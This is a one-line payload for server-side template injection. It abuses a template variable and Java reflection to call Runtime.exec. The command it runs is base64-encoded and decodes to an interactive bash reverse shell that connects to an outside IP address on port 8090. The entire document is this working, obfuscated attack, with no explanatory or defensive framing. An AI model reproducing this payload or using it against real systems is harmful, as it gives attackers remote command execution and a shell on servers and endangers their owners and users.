$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45OC4xNDUuMTk0LzgwOTAgMD4mMQ==}|{base64,-d}|{bash,-i}').waitFor()
